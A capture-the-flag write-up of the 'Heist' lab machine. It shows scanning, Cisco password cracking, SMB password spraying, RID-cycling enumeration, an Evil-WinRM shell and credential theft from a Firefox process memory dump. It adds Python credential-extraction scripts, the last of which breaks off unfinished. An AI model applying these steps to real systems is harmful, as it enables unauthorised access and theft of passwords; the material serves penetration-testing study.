Heist

From Luniwiki


[screenshot: Heist01.png]

Ports scan

u505@kali:~/HTB/Machines/Heist$ sudo masscan -e tun0 -p1-65535,U:1-65535 10.10.10.149 --rate=1000
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-03-06 13:29:45 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.149
Discovered open port 5985/tcp on 10.10.10.149
Discovered open port 80/tcp on 10.10.10.149
Discovered open port 49668/tcp on 10.10.10.149
Discovered open port 135/tcp on 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ nmap -sC -sV 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 08:29 EST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.057s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m34s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-06T13:31:47
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.03 seconds

Nmap on the ports missed by the default scan

u505@kali:~/HTB/Machines/Heist$ nmap -sC -sV -p 80,135,445,5985,49668  10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-06 08:35 EST
Nmap scan report for heist.htb (10.10.10.149)
Host is up (0.17s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m34s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-06T13:38:00
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.56 seconds

Port 5985 is WinRM over HTTP (5986 is the HTTPS listener). The default nmap top-1000 scan did not show it, which is why the full-range masscan sweep is worth the time.

u505@kali:~/HTB/Machines/Heist$ /opt/utils/nmapAutomator/nmapAutomator.sh 10.10.10.149 All

Port 80

[screenshot: Heist02.png]

[screenshot: Heist03.png]

On port 80 there is a PHP web application served by IIS (the PHPSESSID cookie gives the language away).

[screenshot: Heist04.png]

Using the guest login we reach the issues page. It exposes the user hazard, who asks for a Windows account to be created.

[screenshot: Heist05.png]

The attachment (config.txt, a Cisco IOS configuration) discloses two more usernames, rout3r and admin, and three credentials: one type 5 hash and two type 7 obfuscated passwords.


Enumeration

u505@kali:~/HTB/Machines/Heist$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -r 1 -e "txt,php" -f -t 50 -u "Http://heist.htb"

(dirsearch v0.3.9 banner)
Extensions: txt, php | HTTP method: get | Threads: 50 | Wordlist size: 13832 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-03-06_09-14-07.log
Target: Http://heist.htb
[09:14:08] Starting:
[09:14:21] 403 -    1KB - /attachments/
[09:14:37] 403 -    1KB - /css/
[09:14:48] 200 -    1KB - /errorpage.php
[09:15:00] 403 -    1KB - /images/
[09:15:00] 403 -    1KB - /Images/
[09:15:00] 302 -    0B  - /index.php  ->  login.php
[09:15:01] 302 -    0B  - /index.php/  ->  login.php
[09:15:01] 302 -    0B  - /Index.php  ->  login.php
[09:15:03] 302 -   16B  - /issues.php  ->  login.php
[09:15:05] 403 -    1KB - /js/
[09:15:08] 200 -    2KB - /Login.php
[09:15:08] 200 -    2KB - /login.php
[09:16:00] Starting: attachments/
[09:16:24] 200 -  780B  - /attachments/config.txt
[09:17:49] Starting: css/
[09:19:30] Starting: images/
[09:21:13] Starting: Images/
[09:22:50] Starting: js/
Task Completed

The enumeration adds nothing beyond what we already found by hand: the only interesting hit is the config.txt attachment.

Passwords crack

According to https://hashcat.net/wiki/doku.php?id=example_hashes, the type 5 secret (the $1$ string) is Cisco-IOS md5crypt, hashcat mode 500.

u505@kali:~/HTB/Machines/Heist$ cat hash1.txt
$1$pdQG$o8nrSzsGXeaduXrjlvKc91
u505@kali:~/HTB/Machines/Heist$ hashcat -m 500 hash1.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
u505@kali:~/HTB/Machines/Heist$ hashcat -m 500 hash1.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
$1$pdQG$o8nrSzsGXeaduXrjlvKc91:stealth1agent

Cisco type 7 passwords are not hashes but a reversible obfuscation (a fixed-key XOR). They were never intended to resist offline attack and decode instantly.

username rout3r password 7 0242114B0E143F015F5D1E161713

u505@kali:~/HTB/Machines/Heist$ python /opt/utils/ciscot7/ciscot7.py -p 0242114B0E143F015F5D1E161713
Decrypted password: $uperP@ssword
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
u505@kali:~/HTB/Machines/Heist$ python /opt/utils/ciscot7/ciscot7.py -p 02375012182C1A1D751618034F36415408
Decrypted password: Q4)sJu\Y8qz*A3?d
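The type 7 scheme is simple enough to reimplement, which also makes the point that it is obfuscation rather than hashing. The following Python is an added example written for this page, not code from the writeup or from the ciscot7 tool: it decodes and re-encodes type 7 strings with the fixed IOS key, and triages the password/secret lines of a config so type 7 values are decoded on the spot while real hashes (the type 5 secret here) are routed to hashcat with the right mode. SAMPLE_CONFIG is constructed to mirror the attachment; the "enable secret 5" line is an assumption about how the $1$ hash appears in the real config.txt.

```python
"""Cisco IOS credential triage: reverse type 7 strings, route real hashes to hashcat.

Added example for this page; not code from the writeup or from ciscot7.
"""
import re
import secrets
from typing import Dict, List, Optional

# Fixed key IOS uses for "password 7" obfuscation. The first two characters of
# an encoded string are a decimal offset into this key; each following pair of
# hex digits is one plaintext byte XORed with key[(offset + i) % len(key)].
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# IOS credential types that are real hashes, mapped to their hashcat modes.
HASHCAT_MODES = {"4": 5700, "5": 500, "8": 9200, "9": 9300}

CRED_LINE = re.compile(r"\b(?:password|secret)\s+(?P<type>\d)\s+(?P<value>\S+)")
USERNAME = re.compile(r"\busername\s+(?P<user>\S+)")


def type7_decode(encoded: str) -> str:
    """Recover the plaintext of a type 7 string; ValueError if malformed."""
    if len(encoded) < 4 or len(encoded) % 2:
        raise ValueError(f"not a type 7 string: {encoded!r}")
    offset = int(encoded[:2], 10)
    body = bytes.fromhex(encoded[2:])
    plain = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)] for i, b in enumerate(body))
    return plain.decode("ascii")


def type7_encode(plaintext: str, offset: Optional[int] = None) -> str:
    """Produce a type 7 string the way IOS would (random offset 0-15 unless given)."""
    if offset is None:
        offset = secrets.randbelow(16)
    data = plaintext.encode("ascii")
    body = bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)] for i, b in enumerate(data))
    return f"{offset:02d}{body.hex().upper()}"


def triage_config(config_text: str) -> List[Dict]:
    """Walk a config: decode type 7 inline, flag hashes with the hashcat mode to use."""
    findings = []
    for line in config_text.splitlines():
        m = CRED_LINE.search(line)
        if not m:
            continue
        user = USERNAME.search(line)
        entry = {
            "line": line.strip(),
            "user": user["user"] if user else None,
            "type": m["type"],
            "value": m["value"],
            "plaintext": None,
            "hashcat_mode": None,
        }
        if m["type"] == "7":
            entry["plaintext"] = type7_decode(m["value"])
        elif m["type"] == "0":
            entry["plaintext"] = m["value"]  # type 0 is stored in the clear
        else:
            entry["hashcat_mode"] = HASHCAT_MODES.get(m["type"])
        findings.append(entry)
    return findings


# Constructed to mirror the attachment; the "enable secret 5" line is an
# assumption about how the $1$ hash appears in the real config.txt.
SAMPLE_CONFIG = """\
!
version 12.2
service password-encryption
!
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
"""

if __name__ == "__main__":
    for f in triage_config(SAMPLE_CONFIG):
        if f["plaintext"] is not None:
            print(f"type {f['type']}  user={f['user']}  plaintext={f['plaintext']}")
        else:
            print(f"type {f['type']}  user={f['user']}  crack with: hashcat -m {f['hashcat_mode']}")
```

The encoder is there to show the symmetry: any offset gives a different-looking string for the same password, and every one of them decodes back without a key the attacker does not already have. The "service password-encryption" line is deliberately in the sample because it is the setting that produces type 7; the fix on a real device is "enable secret" / "username ... secret" with type 8 or 9.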

Port 445

Enumeration as guest

u505@kali:~/HTB/Machines/Heist$ python /opt/utils/nullinux/nullinux.py 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ smbmap -u anonymous -H 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ nmap -p 445 --script=smb-enum-shares 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ enum4linux 10.10.10.149

As guest, no information is available.

Brute force known user and passwords

crackmapexec lets us try every combination of a user list and a password list against SMB in one run.

u505@kali:~/HTB/Machines/Heist$ cat users
admin
rout3r
hazard
u505@kali:~/HTB/Machines/Heist$ cat pass
Q4)sJu\Y8qz*A3?d
stealth1agent
$uperP@ssword 
u505@kali:~/HTB/Machines/Heist$ crackmapexec smb 10.10.10.149/32 -u users -p pass --continue-on-success
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [+] SUPPORTDESK\hazard:stealth1agent
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\hazard:$uperP@ssword STATUS_LOGON_FAILURE

We find one valid pair: hazard with the cracked type 5 password.

Enumeration as hazard

Authenticated as hazard, the enumeration tools return some output,

u505@kali:~/HTB/Machines/Heist$ smbmap -u hazard -p stealth1agent -H 10.10.10.149
u505@kali:~/HTB/Machines/Heist$ python /opt/utils/nullinux/nullinux.py -U hazard -P stealth1agent 10.10.10.149

but nothing useful. Any authenticated user can, however, enumerate local accounts by RID cycling: LSARPC resolves domain SID + RID to an account name, so we simply walk the RIDs.

u505@kali:~/HTB/Machines/Heist$ python /opt/utils/impacket/examples/lookupsid.py hazard:stealth1agent@10.10.10.149
Impacket v0.9.21.dev1+20200211.101047.70c38fbe - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

crackmapexec also provides RID cycling through its --rid-brute option.

u505@kali:~/HTB/Machines/Heist$ crackmapexec smb 10.10.10.149/32 -u hazard -p stealth1agent --rid-brute
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [+] SUPPORTDESK\hazard:stealth1agent
SMB         10.10.10.149    445    SUPPORTDESK      [+] Brute forcing RIDs
SMB         10.10.10.149    445    SUPPORTDESK      500: SUPPORTDESK\Administrator (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      501: SUPPORTDESK\Guest (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      503: SUPPORTDESK\DefaultAccount (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      513: SUPPORTDESK\None (SidTypeGroup)
SMB         10.10.10.149    445    SUPPORTDESK      1008: SUPPORTDESK\Hazard (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1009: SUPPORTDESK\support (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1012: SUPPORTDESK\Chase (SidTypeUser)
SMB         10.10.10.149    445    SUPPORTDESK      1013: SUPPORTDESK\Jason (SidTypeUser)

Brute force known user and password

We add the new users to the list, keeping hazard last: without --continue-on-success, crackmapexec stops at the first valid login (as happens below when it reaches Chase).

u505@kali:~/HTB/Machines/Heist$ cat users
Administrator
admin
rout3r
support
Chase
Jason
hazard
u505@kali:~/HTB/Machines/Heist$ cat pass
Q4)sJu\Y8qz*A3?d
stealth1agent
$uperP@ssword
u505@kali:~/HTB/Machines/Heist$ crackmapexec smb 10.10.10.149/32 -u users -p pass --shares
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SUPPORTDESK) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\Administrator:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\Administrator:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\admin:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\rout3r:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\support:stealth1agent STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [-] SUPPORTDESK\support:$uperP@ssword STATUS_LOGON_FAILURE
SMB         10.10.10.149    445    SUPPORTDESK      [+] SUPPORTDESK\Chase:Q4)sJu\Y8qz*A3?d
SMB         10.10.10.149    445    SUPPORTDESK      [+] Enumerated shares
SMB         10.10.10.149    445    SUPPORTDESK      Share           Permissions     Remark
SMB         10.10.10.149    445    SUPPORTDESK      -----           -----------     ------
SMB         10.10.10.149    445    SUPPORTDESK      ADMIN$                          Remote Admin
SMB         10.10.10.149    445    SUPPORTDESK      C$                              Default share
SMB         10.10.10.149    445    SUPPORTDESK      IPC$            READ            Remote IPC

User flag

Winrm

When we try the winrm module of crackmapexec with valid credentials for a user who is not a member of BUILTIN\Remote Management Users, the server rejects the credentials outright:

u505@kali:~/HTB/Machines/Heist$ crackmapexec winrm 10.10.10.149/32 -u hazard -p stealth1agent
WINRM       10.10.10.149    5985   NONE             [*] http://10.10.10.149:5985/wsman
WINRM       10.10.10.149    5985   NONE             [-] None\hazard:stealth1agent "the specified credentials were rejected by the server"

But for the user Chase, the behavior is different.

u505@kali:~/HTB/Machines/Heist$ crackmapexec winrm 10.10.10.149/32 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
WINRM       10.10.10.149    5985   NONE             [*] http://10.10.10.149:5985/wsman
WARNING:urllib3.connectionpool:Failed to parse headers (url=http://10.10.10.149:5985/wsman): [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: 
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 441, in _make_request
    assert_header_parsing(httplib_response.msg)
  File "/usr/lib/python3/dist-packages/urllib3/util/response.py", line 71, in assert_header_parsing
    raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
urllib3.exceptions.HeaderParsingError: [StartBoundaryNotFoundDefect(), MultipartInvariantViolationDefect()], unparsed data: 
WINRM       10.10.10.149    5985   NONE             [-] None\Chase:Q4)sJu\Y8qz*A3?d "Access is denied.  (extended fault data: {'transport_message': 'Bad HTTP response returned from server. Code 500', 'http_status_code': 500, 'wsmanfault_code': '5', 'fault_code': 's:Sender', 'fault_subcode': 'w:AccessDenied'})"

Here the response is a WS-Management AccessDenied fault (wsmanfault_code 5 on an HTTP 500) rather than a credential rejection: authentication went through and the failure is on the authorization/protocol side. The HeaderParsingError traceback is urllib3 complaining about the server's response, not a verdict on the credentials. Valid credentials that fail this way are worth retrying with a proper WinRM client.

Evil-WinRM

WinRM (Windows Remote Management) ships with Windows to make remote administration easier. Evil-WinRM is a WinRM shell for pentesting: it works against any Windows host with the service enabled (usually on port 5985), provided you have credentials for an account allowed to use it. The AccessDenied fault above suggests that Chase's credentials are valid, so we try a full client.

u505@kali:~/HTB/Machines/Heist$ evil-winrm -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:39: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:128: warning: constant OpenSSL::Cipher::Cipher is deprecated
/usr/lib/ruby/vendor_ruby/net/ntlm/client/session.rb:138: warning: constant OpenSSL::Cipher::Cipher is deprecated
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Chase\Desktop> type user.txt
<USER_FLAG>

Escalation of privileges

Running processes

*Evil-WinRM* PS C:\Users\Chase\Desktop> ps

Handles  NPM(K)    PM(K)    WS(K)   CPU(s)     Id  SI ProcessName
-------  ------    -----    -----   ------     --  -- -----------
    147      10     6616    11960            1016   0 conhost
    501      19     2276     5360             404   0 csrss
    290      17     2308     5128             492   1 csrss
    358      15     3536    14416            5136   1 ctfmon
    261      14     4212    13432            4000   0 dllhost
    166       9     1848     9788     0.13   6652   1 dllhost
    621      32    34468    59676              80   1 dwm
   1495      58    24240    78924            5440   1 explorer
   1112      62   103892   174384    11.16   6184   1 firefox
    343      19    10000    37348     0.97   6308   1 firefox
    408      31    17428    63468     1.23   6568   1 firefox
    390      29    23044    56064     4.78   6996   1 firefox
    358      25    16272    37732     0.67   7140   1 firefox
     49       6     1436     3608             816   0 fontdrvhost
     49       6     1804     4628             928   1 fontdrvhost
      0       0       56        8               0   0 Idle
   1006      23     5628    14300             644   0 lsass
    153       8     1988     6412            3640   0 MpCmdRun
    231      13     3076    10224            4220   0 msdtc
    588      58   115160    98320            2956   0 MsMpEng
    128      13     6460    13540             996   0 php-cgi
      0      17    10652    78344             104   0 Registry
    290      15     5076    16364            1208   1 RuntimeBroker
    144       8     1632     7488            1620   1 RuntimeBroker
    276      14     3024    15100            4724   1 RuntimeBroker
    668      32    19948    61444            6100   1 SearchUI
    578      11     5304     9688             624   0 services
    700      29    15384    51476            5964   1 ShellExperienceHost
    437      17     4996    23744            4528   1 sihost
     53       3      528     1204             324   0 smss
    475      23     5972    16296            2612   0 spoolsv
    285      13     5004    11952               8   0 svchost
    204      12     2072     9612             496   0 svchost
    232      13     3108    13716             508   0 svchost
    115       7     1244     5180             668   0 svchost
    149       9     1840    11652             708   0 svchost
     85       5      900     3756             768   0 svchost
    874      21     7168    22532             792   0 svchost
    172       9     4868    12772             832   0 svchost
    908      16     5008    11432             868   0 svchost
    252      10     2068     7580             940   0 svchost
    389      13    14384    18120            1068   0 svchost
    227      11     2896    10868            1120   0 svchost
    140       7     1332     5604            1172   0 svchost
    125      16     3532     7380            1192   0 svchost
    223       9     2204     7384            1240   0 svchost
    188       9     1812     7476            1272   0 svchost
    235      12     2508    11076            1320   0 svchost
    154       7     1248     5572            1328   0 svchost
    432       9     2956     9000            1336   0 svchost
    341      15     4560    11644            1424   0 svchost
    382      18     5036    14076            1464   0 svchost
    170      11     1808     7968            1484   0 svchost
    247      14     3124     8292            1576   0 svchost
    284      12     1876     7676            1588   0 svchost
    323      10     2572     8320            1636   0 svchost
    193      12     2180    11932            1752   0 svchost
    163      10     2444     6976            1852   0 svchost
    161       9     2032     7156            1912   0 svchost
    405      32     7832    16732            1932   0 svchost
    164       9     3308     7840            1968   0 svchost
    198      11     1996     8040            1996   0 svchost
    243      11     2668     9756            2036   0 svchost
    353      19    14468    31412            2208   0 svchost
    384      52    13784    18788            2604   0 svchost
    248      25     3384    12512            2692   0 svchost
    265      13     2548     7676            2700   0 svchost
    547      21    13312    27792            2708   0 svchost
    434      16    11208    19932            2716   0 svchost
    166      12     4064    10816            2724   0 svchost
    209      11     2324     8280            2760   0 svchost
    137       9     1632     6452            2768   0 svchost
    140       8     1524     6056            2816   0 svchost
    126       7     1240     5280            2852   0 svchost
    213      12     1816     7316            2924   0 svchost
    240      15     4840    11844            2932   0 svchost
    275      27     3168    11928            2940   0 svchost
    168      10     2144    13064            2992   0 svchost
    462      18     3472    11648            3016   0 svchost
    386      23     3472    12176            3428   0 svchost
    174      11     2620    13232            4144   0 svchost
    126       7     1460     6364            4180   0 svchost
    234      12     3152    13548            4252   1 svchost
    226      13     2748    10716            4276   0 svchost
    236      16     4212    13676            4548   0 svchost
    365      18     5720    26340            4660   1 svchost
    128       7     1236     5688            4672   0 svchost
    190      11     5292    13636            4812   0 svchost
    175       9     1492     7120            4948   0 svchost
    266      13     3696    12884            5032   0 svchost
    210      15     6440    10536            5072   0 svchost
    249      14     3048    13616            5240   0 svchost
    300      15    11216    12280            5460   0 svchost
    120       7     1540     5936            6556   0 svchost
    302      20    10708    14952            6892   0 svchost
   2073       0      192      132               4   0 System
    211      20     4068    12532            4752   1 taskhostw
    283      17    12652    17096            4884   0 taskhostw
    587      52   102992   105676             892   0 TiWorker
    143       8     2080     7284            2180   0 TrustedInstaller
    178      12     3224    10192            2904   0 VGAuthService
    385      22     8680    21584            2896   0 vmtoolsd
    245      18     3840    14976            5716   1 vmtoolsd
    249      27     5796    14788            6080   0 w3wp
    175      11     1492     6588             484   0 wininit
    284      12     2852    12564             556   1 winlogon
    350      16     8584    18232            4088   0 WmiPrvSE
    313      17    22696    30996            5188   0 WmiPrvSE
   1078      27    69248    87488     4.14   3960   0 wsmprovhost

Several firefox processes are running in session 1, which is unexpected on a support box nobody is sitting at and is worth a closer look. A browser process typically holds URLs, form data and its own command line in memory, all of which survive in a process dump.

Procdump

We use ProcDump (from Sysinternals, downloaded from Microsoft) to dump the memory of the Firefox process that uses the most memory (PID 6184). The -mp switch writes a dump with all the process memory except the largest mapped regions, which is enough for strings and small enough to download.

*Evil-WinRM* PS C:\Users\Chase\Desktop> upload /opt/utils/Sysinternals/procdump.exe
Info: Uploading /opt/utils/Sysinternals/procdump.exe to C:\Users\Chase\Desktop\procdump.exe

Data: 868564 bytes of 868564 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Desktop> ./procdump.exe -mp 6184 -accepteula

ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com

[01:44:05] Dump 1 initiated: C:\Users\Chase\Desktop\firefox.exe_200306_014405.dmp
[01:44:08] Dump 1 complete: 122 MB written in 2.5 seconds
[01:44:08] Dump count reached.
*Evil-WinRM* PS C:\Users\Chase\Desktop> dir

    Directory: C:\Users\Chase\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/6/2020   1:44 AM      124424467 firefox.exe_200306_014405.dmp
-a----         3/6/2020   1:38 AM         651424 procdump.exe
-a----        4/22/2019   9:08 AM            121 todo.txt
-a----        4/22/2019   9:07 AM             32 user.txt

*Evil-WinRM* PS C:\Users\Chase\Desktop> download firefox.exe_200306_014405.dmp
Info: Downloading C:\Users\Chase\Desktop\firefox.exe_200306_014405.dmp to firefox.exe_200306_014405.dmp
Info: Download successful!
*Evil-WinRM* PS C:\Users\Chase\Desktop> exit
Info: Exiting with code 0

Dump analysis

Running strings over the dump and grepping for login.php reveals credentials passed to Firefox in a URL on its command line (the MOZ_CRASHREPORTER_RESTART_ARG_1 entry is the crash reporter keeping a copy of that argument):

u505@kali:~/HTB/Machines/Heist$ strings firefox.exe_200306_014405.dmp | grep password | grep login.php
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
O^privateBrowsingId=1,p,:http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
:http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
:http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
http://localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
"C:\Program Files\Mozilla Firefox\firefox.exe" localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
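A scripted version of that dump triage, as an added example written for this page (not part of the writeup): it extracts printable runs the way strings does, but also the UTF-16LE runs that Windows keeps in memory and that strings only reports with -el, then parses every URL that carries a query string and reports parameters whose names look like secrets, deduplicated across encodings. SAMPLE_DUMP is a constructed byte buffer containing the Firefox command line and the login URL in both encodings, not a real memory dump; the key-name heuristics (SECRET_KEY, IDENTITY_KEY) are my own choice.

```python
"""Pull credentials out of a process memory dump by scanning URL query strings.

Added example for this page, not part of the writeup. SAMPLE_DUMP is a
constructed byte buffer standing in for the Firefox dump, not real data.
"""
import re
from typing import Dict, Iterator, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Printable runs of at least 8 chars, as `strings` finds them, plus the
# UTF-16LE runs Windows keeps in memory (what `strings -el` would report).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{8,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){8,}")

# host[:port]/path?query; the scheme, if any, is left out of the match because
# the query string is what carries the credentials.
URL_WITH_QUERY = re.compile(r"[A-Za-z0-9.\-]+(?::\d+)?/[^\s\"'<>?]*\?[^\s\"'<>]+")

# Heuristics for which query parameters are secrets and which name the account.
SECRET_KEY = re.compile(r"pass|pwd|secret|token|auth|key", re.I)
IDENTITY_KEY = re.compile(r"user|login|email|name", re.I)


def extract_strings(blob: bytes) -> Iterator[Tuple[str, str]]:
    """Yield (encoding, text) for every printable run in either encoding."""
    for m in ASCII_RUN.finditer(blob):
        yield "ascii", m.group().decode("ascii")
    for m in UTF16_RUN.finditer(blob):
        yield "utf-16le", m.group().decode("utf-16-le")


def find_credentials(blob: bytes) -> List[Dict]:
    """Return one record per distinct (endpoint, identity, secrets) found."""
    hits: Dict[tuple, Dict] = {}
    for encoding, text in extract_strings(blob):
        for m in URL_WITH_QUERY.finditer(text):
            parts = urlsplit(m.group())
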